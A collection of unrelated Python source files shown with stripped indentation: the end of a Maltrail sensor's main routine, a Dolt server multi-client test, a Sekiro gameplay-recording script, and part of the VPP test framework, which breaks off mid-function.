parser.add_option("-c", dest="config_file", default=CONFIG_FILE, help="configuration file (default: '%s')" % os.path.split(CONFIG_FILE)[-1])
parser.add_option("-i", dest="pcap_file", help="open pcap file for offline analysis")
parser.add_option("-p", dest="plugins", help="plugin(s) to be used per event")
parser.add_option("--console", dest="console", action="store_true", help="print events to console (too)")
parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP)
options, _ = parser.parse_args()
if not check_sudo():
exit("[!] please run '%s' with sudo/Administrator privileges" % __file__)
read_config(options.config_file)
for option in dir(options):
if isinstance(getattr(options, option), (basestring, bool)) and not option.startswith('_'):
config[option] = getattr(options, option)
if options.debug:
config.console = True
config.PROCESS_COUNT = 1
config.SHOW_DEBUG = True
if options.pcap_file:
if not os.path.isfile(options.pcap_file):
exit("[!] missing pcap file '%s'" % options.pcap_file)
else:
print("[i] using pcap file '%s'" % options.pcap_file)
try:
init()
monitor()
except KeyboardInterrupt:
print("\r[x] stopping (Ctrl-C pressed)")
if __name__ == "__main__":
show_final = True
try:
main()
except SystemExit, ex:
show_final = False
if not isinstance(getattr(ex, "message"), int):
print(ex)
except IOError:
show_final = False
log_error("\n\n[!] session abruptly terminated\n[?] (hint: \"https://stackoverflow.com/a/20997655\")")
except Exception:
msg = "\r[!] unhandled exception occurred ('%s')" % sys.exc_info()[1]
msg += "\n[x] please report the following details at 'https://github.com/stamparm/maltrail/issues':\n---\n'%s'\n---" % traceback.format_exc()
log_error("\n\n%s" % msg.replace("\r", ""))
print(msg)
finally:
if show_final:
print("[i] finished")
os._exit(0)
|
server_multiclient_test.py
|
import os
import sys
from queue import Queue
from threading import Thread
from helper.pytest import DoltConnection
# Utility functions
def print_err(e):
print(e, file=sys.stderr)
def query(dc, query_str):
return dc.query(query_str, False)
def query_with_expected_error(dc, non_error_msg, query_str):
try:
dc.query(query_str, False)
raise Exception(non_error_msg)
except:
pass
def row(pk, c1, c2):
return {"pk":str(pk),"c1":str(c1),"c2":str(c2)}
UPDATE_BRANCH_FAIL_MSG = "Failed to update branch"
def commit_and_update_branch(dc, commit_message, expected_hashes, branch_name):
expected_hash = "("
for i, eh in enumerate(expected_hashes):
if i != 0:
expected_hash += " or "
expected_hash += "hash = %s" % eh
expected_hash += ")"
query_str = 'UPDATE dolt_branches SET hash = Commit("%s") WHERE name = "%s" AND %s' % (commit_message, branch_name, expected_hash)
_, row_count = query(dc, query_str)
if row_count != 1:
raise Exception(UPDATE_BRANCH_FAIL_MSG)
query(dc, 'SET @@repo1_head=HASHOF("%s");' % branch_name)
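# Illustrative note (not part of the test): for a single candidate hash the loop above builds
# the predicate '(hash = @@repo1_head)', and for the two merge parents it builds
# '(hash = HASHOF("HEAD^1") or hash = HASHOF("HEAD^2"))', so the generated statement is,
# schematically:
#   UPDATE dolt_branches SET hash = Commit("<message>") WHERE name = "<branch>" AND (hash = ...)
# Exactly one affected row confirms the branch head moved from one of the expected hashes.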
def query_and_test_results(dc, query_str, expected):
results, _ = query(dc, query_str)
if results != expected:
raise Exception("Unexpected results for query:\n\t%s\nExpected:\n\t%s\nActual:\n\t%s" % (query_str, str(), str(results)))
def resolve_theirs(dc):
query_str = "REPLACE INTO test (pk, c1, c2) SELECT their_pk, their_c1, their_c2 FROM dolt_conflicts_test WHERE their_pk IS NOT NULL;"
query(dc, query_str)
query_str = """DELETE FROM test WHERE pk in (
SELECT base_pk FROM dolt_conflicts_test WHERE their_pk IS NULL
);"""
query(dc, query_str)
query(dc, "DELETE FROM dolt_conflicts_test")
def create_branch(dc, branch_name):
query_str = 'INSERT INTO dolt_branches (name, hash) VALUES ("%s", @@repo1_head);' % branch_name
_, row_count = query(dc, query_str)
if row_count != 1:
raise Exception("Failed to create branch")
# work functions
def connect(dc):
dc.connect()
def create_tables(dc):
query(dc, 'SET @@repo1_head=HASHOF("master");')
query(dc, """
CREATE TABLE test (
pk INT NOT NULL,
c1 INT,
c2 INT,
PRIMARY KEY(pk));""")
commit_and_update_branch(dc, "Created tables", ["@@repo1_head"], "master")
query_and_test_results(dc, "SHOW TABLES;", [{"Table": "test"}])
def duplicate_table_create(dc):
query(dc, 'SET @@repo1_head=HASHOF("master");')
query_with_expected_error(dc, "Should have failed creating duplicate table", """
CREATE TABLE test (
pk INT NOT NULL,
c1 INT,
c2 INT,
PRIMARY KEY(pk));""")
def seed_master(dc):
query(dc, 'SET @@repo1_head=HASHOF("master");')
_, row_count = query(dc, 'INSERT INTO test VALUES (0,0,0),(1,1,1),(2,2,2)')
if row_count != 3:
raise Exception("Failed to update rows")
commit_and_update_branch(dc, "Seeded initial data", ["@@repo1_head"], "master")
expected = [row(0,0,0), row(1,1,1), row(2,2,2)]
query_and_test_results(dc, "SELECT pk, c1, c2 FROM test ORDER BY pk", expected)
def modify_pk0_on_master_and_commit(dc):
query(dc, 'SET @@repo1_head=HASHOF("master");')
query(dc, "UPDATE test SET c1=1 WHERE pk=0;")
commit_and_update_branch(dc, "set c1 to 1", ["@@repo1_head"], "master")
def modify_pk0_on_master_no_commit(dc):
query(dc, 'SET @@repo1_head=HASHOF("master");')
query(dc, "UPDATE test SET c1=2 WHERE pk=0")
def fail_to_commit(dc):
try:
commit_and_update_branch(dc, "Created tables", ["@@repo1_head"], "master")
raise Exception("Failed to fail commit")
except Exception as e:
if str(e) != UPDATE_BRANCH_FAIL_MSG:
raise e
def commit_to_feature(dc):
create_branch(dc, "feature")
commit_and_update_branch(dc, "set c1 to 2", ["@@repo1_head"], "feature")
def merge_resolve_commit(dc):
query(dc, 'SET @@repo1_head=Merge("master");')
query_and_test_results(dc, "SELECT * from dolt_conflicts;", [{"table": "test", "num_conflicts": "1"}])
resolve_theirs(dc)
expected = [row(0,1,0), row(1,1,1), row(2,2,2)]
query_and_test_results(dc, "SELECT pk, c1, c2 FROM test ORDER BY pk", expected)
commit_and_update_branch(dc, "resolved conflicts", ['HASHOF("HEAD^1")', 'HASHOF("HEAD^2")'], "master")
# test script
MAX_SIMULTANEOUS_CONNECTIONS = 2
PORT_STR = sys.argv[1]
CONNECTIONS = [None]*MAX_SIMULTANEOUS_CONNECTIONS
for i in range(MAX_SIMULTANEOUS_CONNECTIONS):
CONNECTIONS[i] = DoltConnection(port=int(PORT_STR), database="repo1", user='dolt', auto_commit=False)
WORK_QUEUE = Queue()
# work item run by workers
class WorkItem(object):
def __init__(self, dc, *work_funcs):
self.dc = dc
self.work_funcs = work_funcs
self.exception = None
# worker thread function
def worker():
while True:
try:
item = WORK_QUEUE.get()
for work_func in item.work_funcs:
work_func(item.dc)
WORK_QUEUE.task_done()
except Exception as e:
item.exception = e
WORK_QUEUE.task_done()
# start the worker threads
for i in range(MAX_SIMULTANEOUS_CONNECTIONS):
t = Thread(target=worker)
t.daemon = True
t.start()
# This defines the actual test script. Each stage in the script has a list of work items. Each work item
# in a stage should have a different connection associated with it. Each connection's work is done in parallel,
# and each of the work functions for a connection is executed in order.
work_item_stages = [
[WorkItem(CONNECTIONS[0], connect, create_tables)],
[WorkItem(CONNECTIONS[0], seed_master), WorkItem(CONNECTIONS[1], connect, duplicate_table_create)],
[WorkItem(CONNECTIONS[0], modify_pk0_on_master_and_commit), WorkItem(CONNECTIONS[1], modify_pk0_on_master_no_commit)],
[WorkItem(CONNECTIONS[1], fail_to_commit, commit_to_feature, merge_resolve_commit)]
]
# Loop through the work item stages executing each stage by sending the work items for the stage to the worker threads
# and then waiting for all of them to finish before moving on to the next one. Checks for an error after every stage.
for stage, work_items in enumerate(work_item_stages):
print("Running stage %d / %d" % (stage,len(work_item_stages)))
for work_item in work_items:
WORK_QUEUE.put(work_item)
WORK_QUEUE.join()
for work_item in work_items:
if work_item.exception is not None:
print_err(work_item.exception)
sys.exit(1)
|
sekiro_stream_monitor_healthbars.py
|
import os
import subprocess
import shutil
from threading import Thread, Event
from listeners import create_mouse_listener, create_keyboard_listener
# from collect_episodes import *
from handlers import audiohandler, videohandler
if __name__ == "__main__":
# if os.path.exists('episodes'):
# shutil.rmtree('episodes')
# else:
# os.mkdir('episodes')
filename = "sekiro_output3"
event = Event()
episodes_available = [int(item) for item in os.listdir('episodes') if os.path.isdir(os.path.join('episodes', item))]
if episodes_available:
next_episode = max(episodes_available) + 1
else:
next_episode = 0
os.mkdir('episodes/' + str(next_episode))
episode_path = 'episodes/' + str(next_episode)
# print('wait')
# time.sleep(3.0)
# print('started')
# You can disable recording audio (currently there is no reliable way to sync it properly)
audio_thread = Thread(target=audiohandler, args=(filename, event, episode_path))
video_thread = Thread(target=videohandler, args=(filename, event, episode_path))
keyboard_listener = create_keyboard_listener()
mouse_listener = create_mouse_listener()
keyboard_listener.start()
mouse_listener.start()
audio_thread.start()
video_thread.start()
audio_thread.join()
video_thread.join()
while True:
if event.isSet():
# mouse and keyboard listeners will be stopped at this point
break
merge_into_movie = f'ffmpeg -y -i {filename}.avi -i {filename}.wav -c copy {filename}.mkv'
p = subprocess.Popen(merge_into_movie)
output, _ = p.communicate()
print(output)
os.remove(f'{filename}.avi')
os.remove(f'{filename}.wav')
|
framework.py
|
#!/usr/bin/env python3
from __future__ import print_function
import gc
import logging
import sys
import os
import select
import signal
import subprocess
import unittest
import tempfile
import time
import faulthandler
import random
import copy
import psutil
import platform
from collections import deque
from threading import Thread, Event
from inspect import getdoc, isclass
from traceback import format_exception
from logging import FileHandler, DEBUG, Formatter
from enum import Enum
import scapy.compat
from scapy.packet import Raw
import hook as hookmodule
from vpp_pg_interface import VppPGInterface
from vpp_sub_interface import VppSubInterface
from vpp_lo_interface import VppLoInterface
from vpp_bvi_interface import VppBviInterface
from vpp_papi_provider import VppPapiProvider
import vpp_papi
from vpp_papi.vpp_stats import VPPStats
from vpp_papi.vpp_transport_socket import VppTransportSocketIOError
from log import RED, GREEN, YELLOW, double_line_delim, single_line_delim, \
get_logger, colorize
from vpp_object import VppObjectRegistry
from util import ppp, is_core_present
from scapy.layers.inet import IPerror, TCPerror, UDPerror, ICMPerror
from scapy.layers.inet6 import ICMPv6DestUnreach, ICMPv6EchoRequest
from scapy.layers.inet6 import ICMPv6EchoReply
logger = logging.getLogger(__name__)
# Set up an empty logger for the testcase that can be overridden as necessary
null_logger = logging.getLogger('VppTestCase')
null_logger.addHandler(logging.NullHandler())
PASS = 0
FAIL = 1
ERROR = 2
SKIP = 3
TEST_RUN = 4
class BoolEnvironmentVariable(object):
def __init__(self, env_var_name, default='n', true_values=None):
self.name = env_var_name
self.default = default
self.true_values = true_values if true_values is not None else \
("y", "yes", "1")
def __bool__(self):
return os.getenv(self.name, self.default).lower() in self.true_values
if sys.version_info[0] == 2:
__nonzero__ = __bool__
def __repr__(self):
return 'BoolEnvironmentVariable(%r, default=%r, true_values=%r)' % \
(self.name, self.default, self.true_values)
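# Illustrative sketch (not used by the framework): truthiness is read from the environment
# each time the object is tested, so flipping the variable between checks changes the result.
# 'EXAMPLE_FLAG' is a made-up variable name used only for demonstration.
def _example_bool_env_usage():
    example_flag = BoolEnvironmentVariable('EXAMPLE_FLAG')
    return bool(example_flag)  # True only if EXAMPLE_FLAG is currently y/yes/1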
debug_framework = BoolEnvironmentVariable('TEST_DEBUG')
if debug_framework:
import debug_internal
"""
Test framework module.
The module provides a set of tools for constructing and running tests and
representing the results.
"""
class VppDiedError(Exception):
""" exception for reporting that the subprocess has died."""
signals_by_value = {v: k for k, v in signal.__dict__.items() if
k.startswith('SIG') and not k.startswith('SIG_')}
def __init__(self, rv=None, testcase=None, method_name=None):
self.rv = rv
self.signal_name = None
self.testcase = testcase
self.method_name = method_name
try:
self.signal_name = VppDiedError.signals_by_value[-rv]
except (KeyError, TypeError):
pass
if testcase is None and method_name is None:
in_msg = ''
else:
in_msg = ' while running %s.%s' % (testcase, method_name)
if self.rv:
msg = "VPP subprocess died unexpectedly%s with return code: %d%s."\
% (in_msg, self.rv, ' [%s]' %
(self.signal_name if
self.signal_name is not None else ''))
else:
msg = "VPP subprocess died unexpectedly%s." % in_msg
super(VppDiedError, self).__init__(msg)
class _PacketInfo(object):
"""Private class to create packet info object.
Help process information about the next packet.
Set variables to default values.
"""
#: Store the index of the packet.
index = -1
#: Store the index of the source packet generator interface of the packet.
src = -1
#: Store the index of the destination packet generator interface
#: of the packet.
dst = -1
#: Store expected ip version
ip = -1
#: Store expected upper protocol
proto = -1
#: Store the copy of the former packet.
data = None
def __eq__(self, other):
index = self.index == other.index
src = self.src == other.src
dst = self.dst == other.dst
data = self.data == other.data
return index and src and dst and data
def pump_output(testclass):
""" pump output from vpp stdout/stderr to proper queues """
stdout_fragment = ""
stderr_fragment = ""
while not testclass.pump_thread_stop_flag.is_set():
readable = select.select([testclass.vpp.stdout.fileno(),
testclass.vpp.stderr.fileno(),
testclass.pump_thread_wakeup_pipe[0]],
[], [])[0]
if testclass.vpp.stdout.fileno() in readable:
read = os.read(testclass.vpp.stdout.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stdout_fragment) > 0:
split[0] = "%s%s" % (stdout_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stdout_fragment = split[-1]
testclass.vpp_stdout_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.info(
"VPP STDOUT: %s" % line.rstrip("\n"))
if testclass.vpp.stderr.fileno() in readable:
read = os.read(testclass.vpp.stderr.fileno(), 102400)
if len(read) > 0:
split = read.decode('ascii',
errors='backslashreplace').splitlines(True)
if len(stderr_fragment) > 0:
split[0] = "%s%s" % (stderr_fragment, split[0])
if len(split) > 0 and split[-1].endswith("\n"):
limit = None
else:
limit = -1
stderr_fragment = split[-1]
testclass.vpp_stderr_deque.extend(split[:limit])
if not testclass.cache_vpp_output:
for line in split[:limit]:
testclass.logger.error(
"VPP STDERR: %s" % line.rstrip("\n"))
# ignoring the dummy pipe here intentionally - the
# flag will take care of properly terminating the loop
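# Illustrative trace of the fragment handling above: if a previous read left
# stdout_fragment == "partial" and the next os.read() returns b"line\nnext partial", then
# split[0] becomes "partialline\n", only the complete lines (split[:limit]) are pushed onto
# the deque, and the trailing "next partial" is kept as the new fragment until a newline
# arrives in a later read.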
def _is_skip_aarch64_set():
return BoolEnvironmentVariable('SKIP_AARCH64')
is_skip_aarch64_set = _is_skip_aarch64_set()
def _is_platform_aarch64():
return platform.machine() == 'aarch64'
is_platform_aarch64 = _is_platform_aarch64()
def _running_extended_tests():
return BoolEnvironmentVariable("EXTENDED_TESTS")
running_extended_tests = _running_extended_tests()
def _running_gcov_tests():
return BoolEnvironmentVariable("GCOV_TESTS")
running_gcov_tests = _running_gcov_tests()
class KeepAliveReporter(object):
"""
Singleton object which reports test start to parent process
"""
_shared_state = {}
def __init__(self):
self.__dict__ = self._shared_state
self._pipe = None
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if self._pipe is not None:
raise Exception("Internal error - pipe should only be set once.")
self._pipe = pipe
def send_keep_alive(self, test, desc=None):
"""
Write current test tmpdir & desc to keep-alive pipe to signal liveness
"""
if self.pipe is None:
# if not running forked..
return
if isclass(test):
desc = '%s (%s)' % (desc, unittest.util.strclass(test))
else:
desc = test.id()
self.pipe.send((desc, test.vpp_bin, test.tempdir, test.vpp.pid))
class TestCaseTag(Enum):
# marks the suites that must run at the end
# using only a single test runner
RUN_SOLO = 1
# marks the suites broken on VPP multi-worker
FIXME_VPP_WORKERS = 2
def create_tag_decorator(e):
def decorator(cls):
try:
cls.test_tags.append(e)
except AttributeError:
cls.test_tags = [e]
return cls
return decorator
tag_run_solo = create_tag_decorator(TestCaseTag.RUN_SOLO)
tag_fixme_vpp_workers = create_tag_decorator(TestCaseTag.FIXME_VPP_WORKERS)
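# Illustrative usage (the class name is made up; VppTestCase is defined just below):
#   @tag_run_solo
#   class ExampleSoloTest(VppTestCase):
#       """ Example solo test case """
#
#   ExampleSoloTest.is_tagged_run_solo()   # True, via has_tag(TestCaseTag.RUN_SOLO)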
class VppTestCase(unittest.TestCase):
"""This subclass is a base class for VPP test cases that are implemented as
classes. It provides methods to create and run test case.
"""
extra_vpp_punt_config = []
extra_vpp_plugin_config = []
logger = null_logger
vapi_response_timeout = 5
@property
def packet_infos(self):
"""List of packet infos"""
return self._packet_infos
@classmethod
def get_packet_count_for_if_idx(cls, dst_if_index):
"""Get the number of packet info for specified destination if index"""
if dst_if_index in cls._packet_count_for_dst_if_idx:
return cls._packet_count_for_dst_if_idx[dst_if_index]
else:
return 0
@classmethod
def has_tag(cls, tag):
""" if the test case has a given tag - return true """
try:
return tag in cls.test_tags
except AttributeError:
pass
return False
@classmethod
def is_tagged_run_solo(cls):
""" if the test case class is timing-sensitive - return true """
return cls.has_tag(TestCaseTag.RUN_SOLO)
@classmethod
def instance(cls):
"""Return the instance of this testcase"""
return cls.test_instance
@classmethod
def set_debug_flags(cls, d):
cls.gdbserver_port = 7777
cls.debug_core = False
cls.debug_gdb = False
cls.debug_gdbserver = False
cls.debug_all = False
if d is None:
return
dl = d.lower()
if dl == "core":
cls.debug_core = True
elif dl == "gdb" or dl == "gdb-all":
cls.debug_gdb = True
elif dl == "gdbserver" or dl == "gdbserver-all":
cls.debug_gdbserver = True
else:
raise Exception("Unrecognized DEBUG option: '%s'" % d)
if dl == "gdb-all" or dl == "gdbserver-all":
cls.debug_all = True
@staticmethod
def get_least_used_cpu():
cpu_usage_list = [set(range(psutil.cpu_count()))]
vpp_processes = [p for p in psutil.process_iter(attrs=['pid', 'name'])
if 'vpp_main' == p.info['name']]
for vpp_process in vpp_processes:
for cpu_usage_set in cpu_usage_list:
try:
cpu_num = vpp_process.cpu_num()
if cpu_num in cpu_usage_set:
cpu_usage_set_index = cpu_usage_list.index(
cpu_usage_set)
if cpu_usage_set_index == len(cpu_usage_list) - 1:
cpu_usage_list.append({cpu_num})
else:
cpu_usage_list[cpu_usage_set_index + 1].add(
cpu_num)
cpu_usage_set.remove(cpu_num)
break
except psutil.NoSuchProcess:
pass
for cpu_usage_set in cpu_usage_list:
if len(cpu_usage_set) > 0:
min_usage_set = cpu_usage_set
break
return random.choice(tuple(min_usage_set))
@classmethod
def setUpConstants(cls):
""" Set-up the test case class based on environment variables """
cls.step = BoolEnvironmentVariable('STEP')
d = os.getenv("DEBUG", None)
# inverted case to handle '' == True
c = os.getenv("CACHE_OUTPUT", "1")
cls.cache_vpp_output = False if c.lower() in ("n", "no", "0") else True
cls.set_debug_flags(d)
cls.vpp_bin = os.getenv('VPP_BIN', "vpp")
cls.plugin_path = os.getenv('VPP_PLUGIN_PATH')
cls.test_plugin_path = os.getenv('VPP_TEST_PLUGIN_PATH')
cls.extern_plugin_path = os.getenv('EXTERN_PLUGINS')
plugin_path = None
if cls.plugin_path is not None:
if cls.extern_plugin_path is not None:
plugin_path = "%s:%s" % (
cls.plugin_path, cls.extern_plugin_path)
else:
plugin_path = cls.plugin_path
elif cls.extern_plugin_path is not None:
plugin_path = cls.extern_plugin_path
debug_cli = ""
if cls.step or cls.debug_gdb or cls.debug_gdbserver:
debug_cli = "cli-listen localhost:5002"
coredump_size = None
size = os.getenv("COREDUMP_SIZE")
if size is not None:
coredump_size = "coredump-size %s" % size
if coredump_size is None:
coredump_size = "coredump-size unlimited"
cpu_core_number = cls.get_least_used_cpu()
if not hasattr(cls, "vpp_worker_count"):
cls.vpp_worker_count = 0
worker_config = os.getenv("VPP_WORKER_CONFIG", "")
if worker_config:
elems = worker_config.split(" ")
if elems[0] != "workers" or len(elems) != 2:
raise ValueError("Wrong VPP_WORKER_CONFIG == '%s' value." %
worker_config)
cls.vpp_worker_count = int(elems[1])
if cls.vpp_worker_count > 0 and\
cls.has_tag(TestCaseTag.FIXME_VPP_WORKERS):
cls.vpp_worker_count = 0
default_variant = os.getenv("VARIANT")
if default_variant is not None:
default_variant = "defaults { %s 100 }" % default_variant
else:
default_variant = ""
api_fuzzing = os.getenv("API_FUZZ")
if api_fuzzing is None:
api_fuzzing = 'off'
cls.vpp_cmdline = [
cls.vpp_bin,
"unix", "{", "nodaemon", debug_cli, "full-coredump",
coredump_size, "runtime-dir", cls.tempdir, "}",
"api-trace", "{", "on", "}",
"api-segment", "{", "prefix", cls.shm_prefix, "}",
"cpu", "{", "main-core", str(cpu_core_number), ]
if cls.vpp_worker_count:
cls.vpp_cmdline.extend(["workers", str(cls.vpp_worker_count)])
cls.vpp_cmdline.extend([
"}",
"physmem", "{", "max-size", "32m", "}",
"statseg", "{", "socket-name", cls.stats_sock, "}",
"socksvr", "{", "socket-name", cls.api_sock, "}",
"node { ", default_variant, "}",
"api-fuzz {", api_fuzzing, "}",
"plugins", "{", "plugin", "dpdk_plugin.so", "{", "disable", "}",
"plugin", "rdma_plugin.so", "{", "disable", "}",
"plugin", "lisp_unittest_plugin.so", "{", "enable", "}",
"plugin", "unittest_plugin.so", "{", "enable", "}"
] + cls.extra_vpp_plugin_config + ["}", ])
if cls.extra_vpp_punt_config is not None:
cls.vpp_cmdline.extend(cls.extra_vpp_punt_config)
if plugin_path is not None:
cls.vpp_cmdline.extend(["plugin_path", plugin_path])
if cls.test_plugin_path is not None:
cls.vpp_cmdline.extend(["test_plugin_path", cls.test_plugin_path])
cls.logger.info("vpp_cmdline args: %s" % cls.vpp_cmdline)
cls.logger.info("vpp_cmdline: %s" % " ".join(cls.vpp_cmdline))
@classmethod
def wait_for_enter(cls):
if cls.debug_gdbserver:
print(double_line_delim)
print("Spawned GDB server with PID: %d" % cls.vpp.pid)
elif cls.debug_gdb:
print(double_line_delim)
print("Spawned VPP with PID: %d" % cls.vpp.pid)
else:
cls.logger.debug("Spawned VPP with PID: %d" % cls.vpp.pid)
return
print(single_line_delim)
print("You can debug VPP using:")
if cls.debug_gdbserver:
print("sudo gdb " + cls.vpp_bin +
" -ex 'target remote localhost:{port}'"
.format(port=cls.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume VPP from "
"within gdb by issuing the 'continue' command")
cls.gdbserver_port += 1
elif cls.debug_gdb:
print("sudo gdb " + cls.vpp_bin + " -ex 'attach %s'" % cls.vpp.pid)
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume VPP from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
@classmethod
def run_vpp(cls):
cmdline = cls.vpp_cmdline
if cls.debug_gdbserver:
gdbserver = '/usr/bin/gdbserver'
if not os.path.isfile(gdbserver) or \
not os.access(gdbserver, os.X_OK):
raise Exception("gdbserver binary '%s' does not exist or is "
"not executable" % gdbserver)
cmdline = [gdbserver, 'localhost:{port}'
.format(port=cls.gdbserver_port)] + cls.vpp_cmdline
cls.logger.info("Gdbserver cmdline is %s", " ".join(cmdline))
try:
cls.vpp = subprocess.Popen(cmdline,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
cls.logger.critical("Subprocess returned with non-0 return code: ("
"%s)", e.returncode)
raise
except OSError as e:
cls.logger.critical("Subprocess returned with OS error: "
"(%s) %s", e.errno, e.strerror)
raise
except Exception as e:
cls.logger.exception("Subprocess returned unexpected from "
"%s:", cmdline)
raise
cls.wait_for_enter()
@classmethod
def wait_for_coredump(cls):
corefile = cls.tempdir + "/core"
if os.path.isfile(corefile):
cls.logger.error("Waiting for coredump to complete: %s", corefile)
curr_size = os.path.getsize(corefile)
deadline = time.time() + 60
ok = False
while time.time() < deadline:
cls.sleep(1)
size = curr_size
curr_size = os.path.getsize(corefile)
if size == curr_size:
ok = True
break
if not ok:
cls.logger.error("Timed out waiting for coredump to complete:"
" %s", corefile)
else:
cls.logger.error("Coredump complete: %s, size %d",
corefile, curr_size)
@classmethod
def setUpClass(cls):
"""
Perform class setup before running the testcase
Remove shared memory files, start vpp and connect the vpp-api
"""
super(VppTestCase, cls).setUpClass()
gc.collect() # run garbage collection first
cls.logger = get_logger(cls.__name__)
seed = os.environ["RND_SEED"]
random.seed(seed)
if hasattr(cls, 'parallel_handler'):
cls.logger.addHandler(cls.parallel_handler)
cls.logger.propagate = False
cls.tempdir = tempfile.mkdtemp(
prefix='vpp-unittest-%s-' % cls.__name__)
cls.stats_sock = "%s/stats.sock" % cls.tempdir
cls.api_sock = "%s/api.sock" % cls.tempdir
cls.file_handler = FileHandler("%s/log.txt" % cls.tempdir)
cls.file_handler.setFormatter(
Formatter(fmt='%(asctime)s,%(msecs)03d %(message)s',
datefmt="%H:%M:%S"))
cls.file_handler.setLevel(DEBUG)
cls.logger.addHandler(cls.file_handler)
cls.logger.debug("--- setUpClass() for %s called ---" %
cls.__name__)
cls.shm_prefix = os.path.basename(cls.tempdir) # Only used for VAPI
os.chdir(cls.tempdir)
cls.logger.info("Temporary dir is %s, api socket is %s",
cls.tempdir, cls.api_sock)
cls.logger.debug("Random seed is %s" % seed)
cls.setUpConstants()
cls.reset_packet_infos()
cls._captures = []
cls._old_captures = []
cls.verbose = 0
cls.vpp_dead = False
cls.registry = VppObjectRegistry()
cls.vpp_startup_failed = False
cls.reporter = KeepAliveReporter()
# need to catch exceptions here because if we raise, then the cleanup
# doesn't get called and we might end with a zombie vpp
try:
cls.run_vpp()
cls.reporter.send_keep_alive(cls, 'setUpClass')
VppTestResult.current_test_case_info = TestCaseInfo(
cls.logger, cls.tempdir, cls.vpp.pid, cls.vpp_bin)
cls.vpp_stdout_deque = deque()
cls.vpp_stderr_deque = deque()
cls.pump_thread_stop_flag = Event()
cls.pump_thread_wakeup_pipe = os.pipe()
cls.pump_thread = Thread(target=pump_output, args=(cls,))
cls.pump_thread.daemon = True
cls.pump_thread.start()
if cls.debug_gdb or cls.debug_gdbserver:
cls.vapi_response_timeout = 0
cls.vapi = VppPapiProvider(cls.__name__, cls,
cls.vapi_response_timeout)
if cls.step:
hook = hookmodule.StepHook(cls)
else:
hook = hookmodule.PollHook(cls)
cls.vapi.register_hook(hook)
cls.statistics = VPPStats(socketname=cls.stats_sock)
try:
hook.poll_vpp()
except VppDiedError:
cls.vpp_startup_failed = True
cls.logger.critical(
"VPP died shortly after startup, check the"
" output to standard error for possible cause")
raise
try:
cls.vapi.connect()
except (vpp_papi.VPPIOError, Exception) as e:
cls.logger.debug("Exception connecting to vapi: %s" % e)
cls.vapi.disconnect()
if cls.debug_gdbserver:
print(colorize("You're running VPP inside gdbserver but "
"VPP-API connection failed, did you forget "
"to 'continue' VPP from within gdb?", RED))
raise e
except vpp_papi.VPPRuntimeError as e:
cls.logger.debug("%s" % e)
cls.quit()
raise e
except Exception as e:
cls.logger.debug("Exception connecting to VPP: %s" % e)
cls.quit()
raise e
@classmethod
def _debug_quit(cls):
if (cls.debug_gdbserver or cls.debug_gdb):
try:
cls.vpp.poll()
if cls.vpp.returncode is None:
print()
print(double_line_delim)
print("VPP or GDB server is still running")
print(single_line_delim)
input("When done debugging, press ENTER to kill the "
"process and finish running the testcase...")
except AttributeError:
pass
@classmethod
def quit(cls):
"""
Disconnect vpp-api, kill vpp and cleanup shared memory files
"""
cls._debug_quit()
# first signal that we want to stop the pump thread, then wake it up
if hasattr(cls, 'pump_thread_stop_flag'):
cls.pump_thread_stop_flag.set()
if hasattr(cls, 'pump_thread_wakeup_pipe'):
os.write(cls.pump_thread_wakeup_pipe[1], b'ding dong wake up')
if hasattr(cls, 'pump_thread'):
cls.logger.debug("Waiting for pump thread to stop")
cls.pump_thread.join()
if hasattr(cls, 'vpp_stderr_reader_thread'):
cls.logger.debug("Waiting for stderr pump to stop")
cls.vpp_stderr_reader_thread.join()
if hasattr(cls, 'vpp'):
if hasattr(cls, 'vapi'):
cls.logger.debug(cls.vapi.vpp.get_stats())
cls.logger.debug("Disconnecting class vapi client on %s",
cls.__name__)
cls.vapi.disconnect()
cls.logger.debug("Deleting class vapi attribute on %s",
cls.__name__)
del cls.vapi
cls.vpp.poll()
if cls.vpp.returncode is None:
cls.wait_for_coredump()
cls.logger.debug("Sending TERM to vpp")
cls.vpp.terminate()
cls.logger.debug("Waiting for vpp to die")
try:
outs, errs = cls.vpp.communicate(timeout=5)
except subprocess.TimeoutExpired:
cls.vpp.kill()
outs, errs = cls.vpp.communicate()
cls.logger.debug("Deleting class vpp attribute on %s",
cls.__name__)
cls.vpp.stdout.close()
cls.vpp.stderr.close()
del cls.vpp
if cls.vpp_startup_failed:
stdout_log = cls.logger.info
stderr_log = cls.logger.critical
else:
stdout_log = cls.logger.info
stderr_log = cls.logger.info
if hasattr(cls, 'vpp_stdout_deque'):
stdout_log(single_line_delim)
stdout_log('VPP output to stdout while running %s:', cls.__name__)
stdout_log(single_line_delim)
vpp_output = "".join(cls.vpp_stdout_deque)
with open(cls.tempdir + '/vpp_stdout.txt', 'w') as f:
f.write(vpp_output)
stdout_log('\n%s', vpp_output)
stdout_log(single_line_delim)
if hasattr(cls, 'vpp_stderr_deque'):
stderr_log(single_line_delim)
stderr_log('VPP output to stderr while running %s:', cls.__name__)
stderr_log(single_line_delim)
vpp_output = "".join(cls.vpp_stderr_deque)
with open(cls.tempdir + '/vpp_stderr.txt', 'w') as f:
f.write(vpp_output)
stderr_log('\n%s', vpp_output)
stderr_log(single_line_delim)
@classmethod
def tearDownClass(cls):
""" Perform final cleanup after running all tests in this test-case """
cls.logger.debug("--- tearDownClass() for %s called ---" %
cls.__name__)
cls.reporter.send_keep_alive(cls, 'tearDownClass')
cls.quit()
cls.file_handler.close()
cls.reset_packet_infos()
if debug_framework:
debug_internal.on_tear_down_class(cls)
def show_commands_at_teardown(self):
""" Allow subclass specific teardown logging additions."""
self.logger.info("--- No test specific show commands provided. ---")
def tearDown(self):
""" Show various debug prints after each test """
self.logger.debug("--- tearDown() for %s.%s(%s) called ---" %
(self.__class__.__name__, self._testMethodName,
self._testMethodDoc))
try:
